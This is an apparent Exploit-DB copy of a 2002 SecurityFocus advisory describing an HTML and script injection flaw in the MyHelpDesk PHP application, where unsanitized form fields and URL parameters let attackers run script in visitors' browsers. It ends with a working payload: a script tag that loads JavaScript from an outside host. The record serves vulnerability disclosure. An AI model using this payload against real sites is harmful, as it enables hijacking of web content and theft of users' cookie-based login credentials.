MyHelpDesk 20020509 - HTML Injection

EDB-ID:

21519




Platform:

PHP

Date:

2002-06-10


source: https://www.securityfocus.com/bid/4967/info

It has been reported that MyHelpDesk is vulnerable to HTML injection attacks.

MyHelpDesk does not properly sanitize HTML tags from form fields. Attackers may pass arbitrary HTML and script code through the unsanitized form fields or through parameters specified via URL. The attacker-supplied HTML code will be executed by the web client of users who visit such pages, in the security context of the site running the vulnerable software.

This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users.

<script src="http://forum.olympos.org/f.js">Alper</script>